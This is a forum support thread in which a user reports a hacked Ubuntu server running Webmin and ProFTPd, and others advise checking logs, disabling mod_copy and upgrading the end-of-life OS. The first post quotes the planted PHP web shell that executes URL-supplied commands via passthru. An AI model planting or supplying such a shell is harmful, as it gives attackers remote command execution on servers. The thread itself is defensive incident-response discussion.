My server has been hacked help

7 posts / 0 new
Last post
#1 Sun, 07/19/2015 - 12:21
guesthere

My server has been hacked help

Hi every one i log to my server today and i see new file created i don't know who created this file name of file d.php content of file proftpd

<?php
 passthru($_GET['cmd']);echo 'm3rg3';
?>

and i found backdoor perl can anyone help me i'm using webmine and ubuntu i see in log lot of attack from china can any one explain to me what happen

Sun, 07/19/2015 - 22:27
andreychek

Howdy,

Yeah, unfortunately, that kind of thing can happen. It's likely that the attacker broke in through a vulnerability in a web app, or maybe they guessed one of the passwords for an account in your web app.

First, you'll want to look around and file any files that don't belong there.

You can then look at their timestamps, and match that to activity in the Apache access log for that domain.

That may help you identify how they broke in.

You'd definitely want to make sure your web app is fully up to date, along with any plugins it's running.

-Eric

Mon, 07/20/2015 - 00:42
tpnsolutions
tpnsolutions's picture

Hi,

Drop me a line on Skype tomorrow (Monday) and I'll see what I can do to help you.

Best Regards,
Peter Knowles
TPN Solutions

Email: pknowles@tpnsolutions.com
Phone: 604-782-9342
Skype: tpnsupport
Website: http://www.tpnsolutions.com

Ask me about my new support plans which include a FREE copy of Virtualmin Pro!!!

Best Regards,
Peter Knowles | TPN Solutions
Email: pknowles@tpnsolutions.com | Skype: tpnassist
Mon, 07/20/2015 - 06:57
guesthere

Hi thanks for reply i know but i'm not using any web app and i think i find the exploit it's porftpd exploit ProFTPd 1.3.5 - File Copy - Exploits http://bugs.proftpd.org/show_bug.cgi?id=4169 actualy i disable proftpd
last proftpd log 2015-07-19 00:38:22,950 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session opened. 2015-07-19 00:38:23,441 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): USER ftpuser: no such user found from 59.38.97.174 [59.38.97.174] to ::ffff:213.136.72.38:21 2015-07-19 00:43:22,643 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Login timeout exceeded, disconnected 2015-07-19 00:43:22,685 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Session timed out, disconnected 2015-07-19 00:43:22,688 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session closed.

Mon, 07/20/2015 - 11:06
andreychek

Howdy,

It sounds like you disabled ProFTPd -- that's good if you think that's the issue, you may want to make sure that mod_copy is disabled in ProFTPd.

What distro/version is it that you're using there though?

-Eric

Mon, 07/20/2015 - 11:22
guesthere

Operating system : Ubuntu Linux 13.10 Webmin version : 1.760

Mon, 07/20/2015 - 12:04
andreychek

Ah, Ubuntu 13.10 reached it's end of life over a year ago. So it's no longer receiving any updates, including security updates.

There are likely a number of vulnerabilities on your server now.

We'd highly recommend upgrading to a current distribution.

When using Ubuntu, we recommend the Ubuntu LTS releases, as they're supported for 5 years.

-Eric

Topic locked